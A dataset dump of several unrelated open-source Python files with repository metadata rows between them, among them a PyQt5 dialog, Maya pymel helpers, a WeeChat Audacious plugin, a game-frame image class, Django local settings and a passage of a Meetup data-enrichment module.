# enable this once we have an example if this service being present
# in the json data:
maps_service_enabled = False
if maps_service_enabled:
maps_service = services.get('maps_service')
if maps_service:
maps_api_key = maps_service.get('api_key')
if maps_api_key:
for k in range(0, len(maps_api_key)):
# generates potentially multiple of these keys, which is
# the same behavior as the java plugin.
gen_string(root, 'google_maps_key',
maps_api_key[k].get('maps_api_key'))
tree = ElementTree.ElementTree(root)
indent(root)
if args.l:
for package in packages:
if package:
sys.stdout.write(package + '\n')
else:
path = os.path.dirname(output_filename)
if path and not os.path.exists(path):
os.makedirs(path)
if not args.plist:
tree.write(output_filename, 'utf-8', True)
else:
with open(output_filename, 'w') as ofile:
ofile.write(json_string)
return 0
if __name__ == '__main__':
sys.exit(main())
|
bsd-3-clause
| 2,530,400,691,713,250,300
| 33.150246
| 158
| 0.60714
| false
| 3.84072
| false
| false
| false
|
sealcode/gpandoc
|
ui/recipe_ui.py
|
1
|
3014
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'recipe.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(355, 478)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setObjectName("verticalLayout")
self.vertical_layout_1 = QtWidgets.QVBoxLayout()
self.vertical_layout_1.setObjectName("vertical_layout_1")
self.label_1 = QtWidgets.QLabel(Dialog)
self.label_1.setObjectName("label_1")
self.vertical_layout_1.addWidget(self.label_1)
self.combo_box_1 = QtWidgets.QComboBox(Dialog)
self.combo_box_1.setObjectName("combo_box_1")
self.vertical_layout_1.addWidget(self.combo_box_1)
self.verticalLayout.addLayout(self.vertical_layout_1)
self.vertical_layout_2 = QtWidgets.QVBoxLayout()
self.vertical_layout_2.setObjectName("vertical_layout_2")
self.scroll_1 = QtWidgets.QScrollArea(Dialog)
self.scroll_1.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.scroll_1.setWidgetResizable(True)
self.scroll_1.setObjectName("scroll_1")
self.content_1 = QtWidgets.QWidget()
self.content_1.setGeometry(QtCore.QRect(0, 0, 300, 378))
self.content_1.setMaximumSize(QtCore.QSize(300, 600))
self.content_1.setObjectName("content_1")
self.label_2 = QtWidgets.QLabel(self.content_1)
self.label_2.setGeometry(QtCore.QRect(8, 3, 301, 421))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2.sizePolicy().hasHeightForWidth())
self.label_2.setSizePolicy(sizePolicy)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.scroll_1.setWidget(self.content_1)
self.vertical_layout_2.addWidget(self.scroll_1)
self.button_box_1 = QtWidgets.QDialogButtonBox(Dialog)
self.button_box_1.setOrientation(QtCore.Qt.Horizontal)
self.button_box_1.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.button_box_1.setObjectName("button_box_1")
self.vertical_layout_2.addWidget(self.button_box_1)
self.verticalLayout.addLayout(self.vertical_layout_2)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Wybór przepisu"))
self.label_1.setText(_translate("Dialog", "Lista przepisów:"))
self.label_2.setText(_translate("Dialog", "TextLabel"))
|
lgpl-3.0
| -7,895,148,468,539,092,000
| 47.580645
| 109
| 0.701527
| false
| 3.677656
| false
| false
| false
|
SqueezeStudioAnimation/omtk
|
python/omtk/libs/libPymel.py
|
1
|
14241
|
import logging
import pymel.core as pymel
from maya import OpenMaya
#
# A PyNodeChain is a special pymel-related object that act exactly like a standard array.
# However it allow us to have more bells and whistles.
#
def is_valid_PyNode(val):
return (val and hasattr(val, 'exists') and val.exists()) if val else None
def distance_between_nodes(x, y):
"""
Return the distance between two pynodes.
"""
ax, ay, az = x.getTranslation(space="world")
bx, b, bz = y.getTranslation(space="world")
return ((ax - bx) ** 2 + (ay - b) ** 2 + (az - bz) ** 2) ** 0.5
def distance_between_vectors(a, b):
"""
http://darkvertex.com/wp/2010/06/05/python-distance-between-2-vectors/
"""
return ((a.x - b.x) ** 2 + (a.y - b.y) ** 2 + (a.z - b.z) ** 2) ** 0.5
def is_child_of(node, potential_parent):
while node:
if node == potential_parent:
return True
node = node.getParent()
return False
class PyNodeChain(list):
"""A container for manipulating lists of hosts"""
@property
def start(self):
return next(iter(self), None)
@property
def end(self):
return self[-1] if len(self) > 0 else None
@property
def chain(self):
return self
def duplicate(self):
# Hack - Convert self into list even if self is a list to prevent duplicate self parameter in pymel.duplicate
new_chain = pymel.duplicate(list(self), renameChildren=True, parentOnly=True)
return PyNodeChain(new_chain)
def setParent(self, new_parent, **kwargs):
for node in self:
if node != new_parent and node.getParent() != new_parent:
node.setParent(new_parent, **kwargs)
# todo: convert to property?
def length(self):
length = 0
for i in range(len(self) - 1):
head = self[i]
tail = self[i + 1]
length += distance_between_nodes(head, tail)
return length
# get the first pynode that have the attr
def __getattr__(self, key):
logging.warning("Searching unknow attribute {key} in {self}", key=key, self=self)
first_node = next((node for node in self.__dict__['_list'] if hasattr(node, key)), None)
if first_node is not None:
return getattr(first_node, key)
raise AttributeError
# set all the pynodes that have the attr
def __setattr__(self, key, value):
for node in self:
try:
setattr(node, key, value)
except Exception, e:
logging.error(str(e))
def duplicate_chain(chain):
new_chain = pymel.duplicate(chain, renameChildren=True, parentOnly=True)
return PyNodeChain(new_chain)
def get_num_parents(obj):
num_parents = -1
while obj is not None:
obj = obj.getParent()
num_parents += 1
return num_parents
def get_chains_from_objs(objs):
"""
Take an arbitraty collection of joints and sort them in hyerarchies represented by lists.
"""
chains = []
objs = sorted(objs, key=get_num_parents)
for obj in objs:
parent = obj.getParent()
if parent not in objs:
chains.append([obj])
else:
for chain in chains:
if parent in chain:
chain.append(obj)
return [PyNodeChain(chain) for chain in chains]
def iter_parents(obj):
while obj.getParent() is not None:
obj = obj.getParent()
yield obj
def get_parents(obj):
return list(iter_parents(obj))
'''
parents = []
while obj.getParent() is not None:
parent = obj.getParent()
parents.append(parent)
obj = parent
return parents
'''
def get_common_parents(objs):
"""
Return the first parent that all provided objects share.
:param objs: A list of pymel.PyNode instances.
:return: A pymel.PyNode instance.
"""
parent_sets = set()
for jnt in objs:
parent_set = set(get_parents(jnt))
if not parent_sets:
parent_sets = parent_set
else:
parent_sets &= parent_set
result = next(iter(reversed(sorted(parent_sets, key=get_num_parents))), None)
if result and result in objs:
result = result.getParent()
return result
class Tree(object):
__slots__ = ('val', 'children', 'parent')
def __init__(self, val):
self.val = val
self.children = []
self.parent = None
def append(self, tree):
self.children.append(tree)
tree.parent = self
def __repr__(self):
return '<Tree {0}>'.format(self.val)
def get_tree_from_objs(objs, sort=False):
"""
Sort all provided objects in a tree fashion.
Support missing objects between hierarchy.
Note that tree root value will always be None, representing the root node.
"""
dagpaths = sorted([obj.fullPath() for obj in objs])
root = Tree(None)
def dag_is_child_of(dag_parent, dag_child):
return dag_child.startswith(dag_parent + '|')
last_knot = root
for dagpath in dagpaths:
knot = Tree(dagpath)
# Resolve the new knot parent
p = last_knot
while not (p.val is None or dag_is_child_of(p.val, dagpath)):
p = p.parent
p.append(knot)
# Save the last knot, since we are iterating in alphabetical order,
# we can assume that the next knot parent can be found using this knot.
last_knot = knot
return root
#
# ls() reimplementations
#
def ls(*args, **kwargs):
return PyNodeChain(pymel.ls(*args, **kwargs))
# Wrapper for pymel.ls that return only objects without parents.
def ls_root(*args, **kwargs):
# TODO: Better finding of the root joint
return PyNodeChain(filter(lambda x: x.getParent() is None or type(x.getParent()) != pymel.nt.Joint,
iter(pymel.ls(*args, **kwargs))))
def ls_root_anms(pattern='anm*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_geos(pattern='geo*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_rigs(pattern='rig*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_jnts(pattern='jnt*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
#
# isinstance() reimplementation
#
# Class check for transform PyNodes
def isinstance_of_transform(obj, cls=pymel.nodetypes.Transform):
return isinstance(obj, cls)
# Class check for shape PyNodes
def isinstance_of_shape(obj, cls=pymel.nodetypes.Shape):
if isinstance(obj, pymel.nodetypes.Transform):
return any((shape for shape in obj.getShapes() if isinstance(shape, cls)))
elif isinstance(obj, pymel.nodetypes.Shape):
return isinstance(obj, cls)
def create_zero_grp(obj):
zero_grp = pymel.createNode('transform')
new_name = obj.name() + '_' + 'zero_grp'
zero_grp.rename(new_name)
# Note: Removed for performance
zero_grp.setMatrix(obj.getMatrix(worldSpace=True))
parent = obj.getParent()
if parent:
zero_grp.setParent(parent)
obj.setParent(zero_grp)
return zero_grp
def zero_out_objs(objs):
for o in objs:
create_zero_grp(o)
#
# pymel.datatypes extensions.
#
class Segment(object):
"""
In Maya there's no class to represent a segment.
This is the pymel.datatypes.Segment I've always wanted.
"""
def __init__(self, pos_s, pos_e):
self.pos_s = pos_s
self.pos_e = pos_e
# self.pos_s = numpy.array(pos_s.x, pos_s.y, pos_s.z)
# self.pos_e = numpy.array(pos_e.x, pos_e.y, pos_e.z)
def closest_point(self, p):
"""
http://stackoverflow.com/questions/3120357/get-closest-point-to-a-line
"""
a = self.pos_s
b = self.pos_e
a_to_p = p - a
a_to_b = b - a
ab_length = a_to_b.length()
ap_length = a_to_p.length()
a_to_p_norm = a_to_p.normal()
a_to_b_norm = a_to_b.normal()
atp_dot_atb = a_to_p_norm * (a_to_b_norm) # dot product
dist_norm = atp_dot_atb * ap_length / ab_length
return pymel.datatypes.Vector(
a.x + a_to_b.x * dist_norm,
a.y + a_to_b.y * dist_norm,
a.z + a_to_b.z * dist_norm
)
def closest_point_normalized_distance(self, p, epsilon=0.001):
"""
Same things as .closest_point but only return the distance relative from the length of a to b.
Available for optimisation purpose.
"""
a = self.pos_s
b = self.pos_e
a_to_p = p - a
a_to_b = b - a
ab_length = a_to_b.length()
ap_length = a_to_p.length()
a_to_p_norm = a_to_p.normal()
a_to_b_norm = a_to_b.normal()
atp_dot_atb = a_to_p_norm * a_to_b_norm
return (atp_dot_atb * ap_length / ab_length) if abs(ab_length) > epsilon else 0.0
class SegmentCollection(object):
def __init__(self, segments=None):
if segments is None:
segments = []
self.segments = segments
self.knots = [segment.pos_s for segment in self.segments]
self.knots.append(self.segments[-1].pos_e)
def closest_segment(self, pos):
bound_min = -0.000000000001 # Damn float imprecision
bound_max = 1.0000000000001 # Damn float imprecision
num_segments = len(self.segments)
for i, segment in enumerate(self.segments):
distance_normalized = segment.closest_point_normalized_distance(pos)
if bound_min <= distance_normalized <= bound_max:
return segment, distance_normalized
elif i == 0 and distance_normalized < bound_min: # Handle out-of-bound
return segment, 0.0
elif i == (num_segments - 1) and distance_normalized > bound_max: # Handle out-of-bound
return segment, 1.0
raise Exception("Can't resolve segment for {0}".format(pos))
def closest_segment_index(self, pos):
closest_segment, ratio = self.closest_segment(pos)
index = self.segments.index(closest_segment)
return index, ratio
def get_knot_weights(self, dropoff=1.0, normalize=True):
num_knots = len(self.knots)
knots_weights = []
for i, knot in enumerate(self.knots):
if i == 0:
weights = [0] * num_knots
weights[0] = 1.0
elif i == (num_knots - 1):
weights = [0] * num_knots
weights[-1] = 1.0
else:
weights = []
total_weight = 0.0
for j in range(num_knots):
distance = abs(j - i)
weight = max(0, 1.0 - (distance / dropoff))
total_weight += weight
weights.append(weight)
weights = [weight / total_weight for weight in weights]
knots_weights.append(weights)
return knots_weights
'''
def get_weights(self, pos, dropoff=1.0, normalize=True):
# Compute the 'SegmentCollection' relative ratio and return the weight for each knots.
closest_segment, relative_ratio = self.closest_segment(pos)
index = self.segments.index(closest_segment)
absolute_ratio = relative_ratio + index
weights = []
total_weights = 0.0
for segment_ratio in range(len(self.knots)):
#segment_ratio += 0.5 # center of the joint
#print segment_ratio, absolute_ratio
distance = abs(segment_ratio - absolute_ratio)
weight = max(0, 1.0-(distance/dropoff))
# Apply cubic interpolation for greater results.
#weight = interp_cubic(weight)
total_weights += weight
weights.append(weight)
if normalize:
weights = [weight / total_weights for weight in weights]
return weights
'''
@classmethod
def from_transforms(cls, objs):
segments = []
num_objs = len(objs)
for i in range(num_objs - 1):
obj_s = objs[i]
obj_e = objs[i + 1]
mfn_transform_s = obj_s.__apimfn__()
mfn_transform_e = obj_e.__apimfn__()
pos_s = OpenMaya.MVector(mfn_transform_s.getTranslation(OpenMaya.MSpace.kWorld))
pos_e = OpenMaya.MVector(mfn_transform_e.getTranslation(OpenMaya.MSpace.kWorld))
segment = Segment(pos_s, pos_e)
segments.append(segment)
return cls(segments)
@classmethod
def from_positions(cls, positions):
segments = []
num_positions = len(positions)
for i in range(num_positions - 1):
pos_s = positions[i]
pos_e = positions[i + 1]
segment = Segment(pos_s, pos_e)
segments.append(segment)
return cls(segments)
def get_rotation_from_matrix(tm):
"""
Bypass pymel bug
see https://github.com/LumaPictures/pymel/issues/355
"""
return pymel.datatypes.TransformationMatrix(tm).rotate
def makeIdentity_safe(obj, translate=False, rotate=False, scale=False, apply=False, **kwargs):
"""
Extended pymel.makeIdentity method that won't crash for idiotic reasons.
"""
from . import libAttr
affected_attrs = []
# Ensure the shape don't have any extra transformation.
if apply:
if translate:
libAttr.unlock_translation(obj)
affected_attrs.extend([
obj.translate, obj.translateX, obj.translateY, obj.translateZ
])
if rotate:
libAttr.unlock_rotation(obj)
affected_attrs.extend([
obj.rotate, obj.rotateX, obj.rotateY, obj.rotateZ
])
if scale:
libAttr.unlock_scale(obj)
affected_attrs.extend([
obj.scale, obj.scaleX, obj.scaleY, obj.scaleZ
])
# Make identify will faile if attributes are connected...
with libAttr.context_disconnected_attrs(affected_attrs, hold_inputs=True, hold_outputs=False):
pymel.makeIdentity(obj, apply=apply, translate=translate, rotate=rotate, scale=scale, **kwargs)
|
mit
| 3,718,975,997,942,480,400
| 29.17161
| 117
| 0.59118
| false
| 3.587154
| false
| false
| false
|
microsoft/task_oriented_dialogue_as_dataflow_synthesis
|
src/dataflow/leaderboard/predict.py
|
1
|
2613
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
Semantic Machines\N{TRADE MARK SIGN} software.
Creates the prediction files from onmt_translate output for the leaderboard.
"""
import argparse
from typing import List
import jsons
from more_itertools import chunked
from dataflow.core.dialogue import TurnId
from dataflow.core.io import save_jsonl_file
from dataflow.core.turn_prediction import TurnPrediction
def build_prediction_report_datum(
datum_id_line: str, src_line: str, nbest_lines: List[str],
) -> TurnPrediction:
datum_id = jsons.loads(datum_id_line.strip(), TurnId)
return TurnPrediction(
datum_id=datum_id,
user_utterance=src_line.strip(),
lispress=nbest_lines[0].strip(),
)
def create_onmt_prediction_report(
datum_id_jsonl: str, src_txt: str, ref_txt: str, nbest_txt: str, nbest: int,
):
prediction_report = [
build_prediction_report_datum(
datum_id_line=datum_id_line, src_line=src_line, nbest_lines=nbest_lines,
)
for datum_id_line, src_line, ref_line, nbest_lines in zip(
open(datum_id_jsonl),
open(src_txt),
open(ref_txt),
chunked(open(nbest_txt), nbest),
)
]
save_jsonl_file(prediction_report, "predictions.jsonl")
def main(
datum_id_jsonl: str, src_txt: str, ref_txt: str, nbest_txt: str, nbest: int,
) -> None:
"""Creates 1-best predictions and saves them to files."""
create_onmt_prediction_report(
datum_id_jsonl=datum_id_jsonl,
src_txt=src_txt,
ref_txt=ref_txt,
nbest_txt=nbest_txt,
nbest=nbest,
)
def add_arguments(argument_parser: argparse.ArgumentParser) -> None:
argument_parser.add_argument("--datum_id_jsonl", help="datum ID file")
argument_parser.add_argument("--src_txt", help="source sequence file")
argument_parser.add_argument("--ref_txt", help="target sequence reference file")
argument_parser.add_argument("--nbest_txt", help="onmt_translate output file")
argument_parser.add_argument("--nbest", type=int, help="number of hypos per datum")
if __name__ == "__main__":
cmdline_parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawTextHelpFormatter
)
add_arguments(cmdline_parser)
args = cmdline_parser.parse_args()
print("Semantic Machines\N{TRADE MARK SIGN} software.")
main(
datum_id_jsonl=args.datum_id_jsonl,
src_txt=args.src_txt,
ref_txt=args.ref_txt,
nbest_txt=args.nbest_txt,
nbest=args.nbest,
)
|
mit
| -9,164,045,024,337,558,000
| 30.865854
| 87
| 0.66284
| false
| 3.337165
| false
| false
| false
|
nashgul/weechat
|
audacious_script/audacious.py
|
1
|
3067
|
# audacious now playing for weechat
# nashgul <m.alcocer1978@gmail.com>
# version 0.1
# white => "00", black => "01", darkblue => "02", darkgreen => "03", lightred => "04", darkred => "05", magenta => "06", orange => "07", yellow => "08", lightgreen => "09", cyan => "10", lightcyan => "11", lightblue => "12", lightmagenta => "13", gray => "14", lightgray => "15"
import weechat
import subprocess
weechat.register("audacious_np", "nashgul", "0.01", "GPL2", "now playing for audacious (usage: /audacious)", "", "")
name = 'audacious'
description = 'show now playing for audacious'
hook = weechat.hook_command(name, description, '', '', '', 'now_playing', '')
def get_info_array():
info_list = (['audtool current-song',
'audtool current-song-length',
'audtool current-song-output-length',
'audtool current-song-bitrate-kbps',
'audtool current-song-filename'])
results = []
for x in info_list:
temporal = subprocess.Popen(x, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
b = temporal.stdout.read().splitlines()
results.append(b[0])
return results
def now_playing(datos, channel, args):
colors = {
'white' : '00', 'black' : '01', 'darkblue' : '02', 'darkgreen' : '03',
'lightred' : '04', 'darkred' : '05', 'magenta' : '06', 'orange' : '07',
'yellow' : '08', 'lightgreen' : '09', 'cyan' : '10', 'lightcyan' : '11',
'lightblue' : '12', 'lightmagenta' : '13', 'gray' : '14', 'lightgray' : '15'
}
info_array = get_info_array()
message_color = "%s" % colors['darkblue']
message = u'\x03' + message_color + 'esta reproduciendo' + u'\x0f'
song_color = "%s" % colors['lightred']
song = u'\x03' + song_color + info_array[0] + u'\x0f'
song_filename_color = "%s" % colors['lightred']
song_filename = u'\x03' + song_filename_color + info_array[4] + u'\x0f'
brackets_color = "%s" % colors['yellow']
bracket_1 = u'\x03' + brackets_color + '[' + u'\x0f'
bracket_2 = u'\x03' + brackets_color + ']' + u'\x0f'
hyphen_color = "%s" % colors['yellow']
hyphen = u'\x03' + hyphen_color + ' - ' + u'\x0f'
at_color = "%s" % colors['yellow']
at_sym = u'\x03' + at_color + '@' + u'\x0f'
output_length_color = "%s" % colors['lightblue']
output_length = u'\x03' + output_length_color + info_array[2] + u'\x0f'
length = ''
if info_array[1] != '0:00':
length_color = "%s" % colors['lightblue']
length = u'\x03' + length_color + hyphen + ' ' + info_array[1] + ' ' + u'\x0f'
bitrate_color = "%s" % colors['lightmagenta']
bitrate = u'\x03' + bitrate_color + info_array[3] + ' kbps' + u'\x0f'
string = "%s %s %s%s %s %s" %(bracket_1, output_length, length, at_sym, bitrate, bracket_2)
source = ''
if song_filename.lower().startswith('http'):
source = song_filename
output_string = "%s: %s %s %s" %(message, source, song, string)
weechat.command(channel, "/me %s" % (output_string))
return weechat.WEECHAT_RC_OK
|
gpl-2.0
| -6,693,482,823,102,077,000
| 45.469697
| 278
| 0.573525
| false
| 2.879812
| false
| false
| false
|
SerpentAI/SerpentAI
|
serpent/game_frame.py
|
1
|
5346
|
import skimage.color
import skimage.measure
import skimage.transform
import skimage.filters
import skimage.morphology
import numpy as np
import io
from PIL import Image
class GameFrameError(BaseException):
pass
class GameFrame:
def __init__(self, frame_data, frame_variants=None, timestamp=None, **kwargs):
if isinstance(frame_data, bytes):
self.frame_bytes = frame_data
self.frame_array = None
elif isinstance(frame_data, np.ndarray):
self.frame_bytes = None
self.frame_array = frame_data
self.frame_variants = frame_variants or dict()
self.timestamp = timestamp
self.offset_x = kwargs.get("offset_x") or 0
self.offset_y = kwargs.get("offset_y") or 0
self.resize_order = kwargs.get("resize_order") or 1
@property
def frame(self):
return self.frame_array if self.frame_array is not None else self.frame_bytes
@property
def half_resolution_frame(self):
""" A quarter-sized version of the frame (half-width, half-height)"""
if "half" not in self.frame_variants:
self.frame_variants["half"] = self._to_half_resolution()
return self.frame_variants["half"]
@property
def quarter_resolution_frame(self):
""" A sixteenth-sized version of the frame (quarter-width, quarter-height)"""
if "quarter" not in self.frame_variants:
self.frame_variants["quarter"] = self._to_quarter_resolution()
return self.frame_variants["quarter"]
@property
def eighth_resolution_frame(self):
""" A 1/32-sized version of the frame (eighth-width, eighth-height)"""
if "eighth" not in self.frame_variants:
self.frame_variants["eighth"] = self._to_eighth_resolution()
return self.frame_variants["eighth"]
@property
def eighth_resolution_grayscale_frame(self):
""" A 1/32-sized, grayscale version of the frame (eighth-width, eighth-height)"""
if "eighth_grayscale" not in self.frame_variants:
self.frame_variants["eighth_grayscale"] = self._to_eighth_grayscale_resolution()
return self.frame_variants["eighth_grayscale"]
@property
def grayscale_frame(self):
""" A full-size grayscale version of the frame"""
if "grayscale" not in self.frame_variants:
self.frame_variants["grayscale"] = self._to_grayscale()
return self.frame_variants["grayscale"]
@property
def ssim_frame(self):
""" A 100x100 grayscale frame to be used for SSIM"""
if "ssim" not in self.frame_variants:
self.frame_variants["ssim"] = self._to_ssim()
return self.frame_variants["ssim"]
@property
def top_color(self):
height, width, channels = self.eighth_resolution_frame.shape
values, counts = np.unique(self.eighth_resolution_frame.reshape(width * height, channels), axis=0, return_counts=True)
return [int(i) for i in values[np.argsort(counts)[::-1][0]]]
def compare_ssim(self, previous_game_frame):
return skimage.measure.compare_ssim(previous_game_frame.ssim_frame, self.ssim_frame)
def difference(self, previous_game_frame):
current = skimage.filters.gaussian(self.grayscale_frame, 8)
previous = skimage.filters.gaussian(previous_game_frame.grayscale_frame, 8)
return current - previous
def to_pil(self):
return Image.fromarray(self.frame)
def to_png_bytes(self):
pil_frame = Image.fromarray(skimage.util.img_as_ubyte(self.frame))
if len(self.frame.shape) == 3:
pil_frame = pil_frame.convert("RGB")
png_frame = io.BytesIO()
pil_frame.save(png_frame, format="PNG", compress_level=3)
png_frame.seek(0)
return png_frame.read()
# TODO: Refactor Fraction of Resolution Frames...
def _to_half_resolution(self):
shape = (
self.frame_array.shape[0] // 2,
self.frame_array.shape[1] // 2
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_quarter_resolution(self):
shape = (
self.frame_array.shape[0] // 4,
self.frame_array.shape[1] // 4
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_eighth_resolution(self):
shape = (
self.frame_array.shape[0] // 8,
self.frame_array.shape[1] // 8
)
return np.array(skimage.transform.resize(self.frame_array, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_eighth_grayscale_resolution(self):
shape = (
self.frame_array.shape[0] // 8,
self.frame_array.shape[1] // 8
)
return np.array(skimage.transform.resize(self.grayscale_frame, shape, mode="reflect", order=self.resize_order) * 255, dtype="uint8")
def _to_grayscale(self):
return np.array(skimage.color.rgb2gray(self.frame_array) * 255, dtype="uint8")
def _to_ssim(self):
grayscale = self.grayscale_frame
return skimage.transform.resize(grayscale, (100, 100), mode="reflect", order=0)
|
mit
| -799,488,949,246,343,400
| 31.204819
| 140
| 0.633558
| false
| 3.554521
| false
| false
| false
|
agraubert/agutil
|
agutil/parallel/src/dispatcher.py
|
1
|
2555
|
from .exceptions import _ParallelBackgroundException
from .worker import ThreadWorker, ProcessWorker
from itertools import zip_longest
WORKERTYPE_THREAD = ThreadWorker
WORKERTYPE_PROCESS = ProcessWorker
class IterDispatcher:
def __init__(
self,
func,
*args,
maximum=15,
workertype=WORKERTYPE_THREAD,
**kwargs
):
self.func = func
self.maximum = maximum
self.args = [iter(arg) for arg in args]
self.kwargs = {key: iter(v) for (key, v) in kwargs.items()}
self.worker = workertype
def run(self):
yield from self.dispatch()
def dispatch(self):
self.worker = self.worker(self.maximum)
try:
output = []
for args, kwargs in self._iterargs():
# _args = args if args is not None else []
# _kwargs = kwargs if kwargs is not None else {}
output.append(self.worker.work(
self.func,
*args,
**kwargs
))
for callback in output:
result = callback()
if isinstance(result, _ParallelBackgroundException):
raise result.exc
yield result
finally:
self.worker.close()
def _iterargs(self):
while True:
args = []
had_arg = False
for src in self.args:
try:
args.append(next(src))
had_arg = True
except StopIteration:
return # args.append(None)
kwargs = {}
for key, src in self.kwargs.items():
try:
kwargs[key] = next(src)
had_arg = True
except StopIteration:
return # kwargs[key] = None
if not had_arg:
return
yield args, kwargs
def __iter__(self):
yield from self.dispatch()
def is_alive(self):
return self.worker.is_alive()
class DemandDispatcher:
def __init__(self, func, maximum=15, workertype=WORKERTYPE_THREAD):
self.maximum = maximum
self.func = func
self.worker = workertype(self.maximum)
def dispatch(self, *args, **kwargs):
try:
return self.worker.work(self.func, *args, **kwargs)
except BaseException:
self.worker.close()
raise
def close(self):
self.worker.close()
|
mit
| 1,826,956,604,685,546,800
| 27.707865
| 71
| 0.508415
| false
| 4.620253
| false
| false
| false
|
juliancantillo/royal-films
|
config/settings/local.py
|
1
|
1950
|
# -*- coding: utf-8 -*-
'''
Local settings
- Run in Debug mode
- Use console backend for emails
- Add Django Debug Toolbar
- Add django-extensions as app
'''
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', default=True)
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env("DJANGO_SECRET_KEY", default='t3kohnptyzfb7v@s@4dlm2o1356rz&^oamd-y34qat^^69b+s(')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND',
default='django.core.mail.backends.console.EmailBackend')
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar', )
INTERNAL_IPS = ('127.0.0.1', '10.0.2.2',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions', )
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Your local stuff: Below this line define 3rd party library settings
|
mit
| -7,272,907,053,856,914,000
| 30.451613
| 99
| 0.488205
| false
| 4.211663
| false
| false
| false
|
grimoirelab/GrimoireELK
|
grimoire_elk/enriched/meetup.py
|
1
|
13379
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2019 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Alvaro del Castillo San Felix <acs@bitergia.com>
#
import copy
import logging
from grimoirelab_toolkit.datetime import unixtime_to_datetime
from .enrich import Enrich, metadata
from ..elastic_mapping import Mapping as BaseMapping
MAX_SIZE_BULK_ENRICHED_ITEMS = 200
logger = logging.getLogger(__name__)
class Mapping(BaseMapping):
@staticmethod
def get_elastic_mappings(es_major):
"""Get Elasticsearch mapping.
:param es_major: major version of Elasticsearch, as string
:returns: dictionary with a key, 'items', with the mapping
"""
mapping = """
{
"properties": {
"description_analyzed": {
"type": "text",
"index": true
},
"comment": {
"type": "text",
"index": true
},
"venue_geolocation": {
"type": "geo_point"
},
"group_geolocation": {
"type": "geo_point"
}
}
} """
return {"items": mapping}
class MeetupEnrich(Enrich):
mapping = Mapping
def get_field_author(self):
return "author"
def get_identities(self, item):
''' Return the identities from an item '''
item = item['data']
# Creators
if 'event_hosts' in item:
user = self.get_sh_identity(item['event_hosts'][0])
yield user
# rsvps
rsvps = item.get('rsvps', [])
for rsvp in rsvps:
user = self.get_sh_identity(rsvp['member'])
yield user
# Comments
for comment in item['comments']:
user = self.get_sh_identity(comment['member'])
yield user
def get_sh_identity(self, item, identity_field=None):
identity = {'username': None, 'email': None, 'name': None}
if not item:
return identity
user = item
if 'data' in item and type(item) == dict:
user = item['data'][identity_field]
identity['username'] = str(user["id"])
identity['email'] = None
identity['name'] = user["name"]
return identity
def get_project_repository(self, eitem):
return eitem['tag']
@metadata
def get_rich_item(self, item):
# We need to detect the category of item: activities (report), events or users
eitem = {}
if 'time' not in item['data']:
logger.warning("[meetup] Not processing %s: no time field", item['uuid'])
return eitem
for f in self.RAW_FIELDS_COPY:
if f in item:
eitem[f] = item[f]
else:
eitem[f] = None
event = item['data']
# data fields to copy
copy_fields = ["id", "how_to_find_us"]
for f in copy_fields:
if f in event:
eitem[f] = event[f]
else:
eitem[f] = None
